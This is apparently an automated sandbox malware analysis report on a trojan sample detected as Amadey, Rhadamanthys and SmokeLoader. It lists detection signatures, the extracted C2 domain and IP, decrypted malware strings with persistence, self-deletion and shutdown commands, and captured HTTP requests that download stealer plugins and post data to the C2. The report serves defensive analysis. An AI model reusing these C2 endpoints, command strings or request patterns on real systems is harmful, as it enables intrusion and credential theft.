Windows Analysis Report
xwREqjHUEv.exe

Overview

General Information

Sample name: xwREqjHUEv.exe
renamed because original name is a hash value
Original sample name: 068c05b9f062da142d266a374866d3bb.exe
Analysis ID: 1423732
MD5: 068c05b9f062da142d266a374866d3bb
SHA1: 315726e1015e1e69cf9645bda713f463e93a8755
SHA256: cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a
Tags: 32exetrojan
Infos:

Detection

Amadey, RHADAMANTHYS, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Powershell dedcode and execute
Yara detected RHADAMANTHYS Stealer
Yara detected SmokeLoader
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Rhadamanthys According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
 https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://atillapro.com/vsdjcn3khS/Plugins/cred64.dll Avira URL Cloud: Label: malware
Source: https://atillapro.com/ Avira URL Cloud: Label: malware
Source: atillapro.com/vsdjcn3khS/index.php Avira URL Cloud: Label: malware
Source: http://atillapro.com/ Avira URL Cloud: Label: malware
Source: http://atillapro.com/vsdjcn3khS/index.php?scr=1 Avira URL Cloud: Label: malware
Source: http://atillapro.com/vsdjcn3khS/Plugins/clip64.dll Avira URL Cloud: Label: malware
Source: http://atillapro.com/vsdjcn3khS/index.php Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\gfiecjd Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\F557.exe Avira: detection malicious, Label: TR/AD.Nekark.nsorh
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\F324.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Avira: detection malicious, Label: TR/AD.Nekark.nsorh
Found malware configuration
Source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://atillapro.com/", "https://atillapro.com/"]}
Source: 31.0.Utsysc.exe.5f0000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": "atillapro.com/vsdjcn3khS/index.php", "Version": "4.12"}
Multi AV Scanner detection for domain / URL
Source: atillapro.com Virustotal: Detection: 16% Perma Link
Source: atillapro.com/vsdjcn3khS/index.php Virustotal: Detection: 15% Perma Link
Source: http://atillapro.com/vsdjcn3khS/index.php?scr=1 Virustotal: Detection: 12% Perma Link
Source: http://atillapro.com/vsdjcn3khS/Plugins/cred64.dll Virustotal: Detection: 19% Perma Link
Source: http://atillapro.com/vsdjcn3khS/index.php Virustotal: Detection: 15% Perma Link
Source: https://atillapro.com/ Virustotal: Detection: 15% Perma Link
Source: http://atillapro.com/ Virustotal: Detection: 16% Perma Link
Source: http://atillapro.com/vsdjcn3khS/Plugins/clip64.dll Virustotal: Detection: 19% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\F324.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\F324.exe Virustotal: Detection: 70% Perma Link
Source: C:\Users\user\AppData\Local\Temp\F557.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\F557.exe Virustotal: Detection: 81% Perma Link
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Virustotal: Detection: 81% Perma Link
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\AppData\Roaming\gfiecjd ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\gfiecjd Virustotal: Detection: 69% Perma Link
Source: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP2810.tmp (copy) ReversingLabs: Detection: 75%
Source: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP2810.tmp (copy) Virustotal: Detection: 69% Perma Link
Multi AV Scanner detection for submitted file
Source: xwREqjHUEv.exe Virustotal: Detection: 23% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\gfiecjd Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F557.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: atillapro.com
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /vsdjcn3khS/index.php
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: S-%lu-
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: bb8ef99577
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Utsysc.exe
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SCHTASKS
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /TR "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Startup
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: cmd /C RMDIR /s/q
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: rundll32
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /Delete /TN "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Programs
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: %USERPROFILE%
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: cred.dll|clip.dll|
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: http://
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: https://
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /Plugins/
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: &unit=
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: shell32.dll
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: kernel32.dll
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: GetNativeSystemInfo
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ProgramData\
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: AVAST Software
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Kaspersky Lab
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Panda Security
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Doctor Web
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: 360TotalSecurity
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Bitdefender
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Norton
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Sophos
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Comodo
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: WinDefender
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: 0123456789
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ------
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ?scr=1
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ComputerName
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: -unicode-
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: VideoID
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: DefaultSettings.XResolution
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: DefaultSettings.YResolution
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ProductName
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: CurrentBuild
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: echo Y|CACLS "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: " /P "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: CACLS "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: :R" /E
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: :F" /E
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: &&Exit
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: rundll32.exe
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: "taskkill /f /im "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: " && timeout 1 && del
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: && Exit"
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: " && ren
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Powershell.exe
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: shutdown -s -t 0
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFFF7C CryptUnprotectData, 13_3_00007DF488BFFF7C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW, 25_2_030A3098
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW, 25_2_030A3717
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3E04 RtlCompareMemory,CryptUnprotectData, 25_2_030A3E04
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA, 25_2_030A123B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A1198 CryptBinaryToStringA,CryptBinaryToStringA, 25_2_030A1198
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW, 25_2_030A11E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A1FCE CryptUnprotectData,RtlMoveMemory, 25_2_030A1FCE
Uses 32bit PE files
Source: xwREqjHUEv.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: xwREqjHUEv.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000008.00000003.2107474129.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000008.00000003.2106681750.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2106830579.0000000005870000.00000004.00000001.00020000.00000000.sdmp, F324.exe, 00000017.00000003.2780142315.0000000003B00000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000008.00000003.2107068189.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2107215768.0000000005820000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000008.00000003.2106681750.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2106830579.0000000005870000.00000004.00000001.00020000.00000000.sdmp, F324.exe, 00000017.00000003.2780142315.0000000003B00000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000008.00000003.2107068189.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2107215768.0000000005820000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000008.00000003.2107474129.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C63
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00402910 FindFirstFileW, 0_2_00402910
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_004068B4 FindFirstFileW,FindClose, 0_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A14DE FindFirstFileExW, 24_2_005A14DE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 25_2_030A2B15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 25_2_030A3ED9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 25_2_030A1D4A
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08E20 GetLogicalDriveStringsW, 13_3_00007DF488C08E20
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 13_3_00007DF488C0BFA1
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 13_2_0000024AB87F0511
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 4x nop then dec esp 14_2_000001FF71025641
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 4x nop then ret 14_2_000001FF7102108E

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 185.196.8.137 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://atillapro.com/
Source: Malware configuration extractor URLs: https://atillapro.com/
Source: Malware configuration extractor URLs: atillapro.com/vsdjcn3khS/index.php
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /vsdjcn3khS/Plugins/cred64.dll HTTP/1.1Host: atillapro.com
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: GET /vsdjcn3khS/Plugins/clip64.dll HTTP/1.1Host: atillapro.com
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
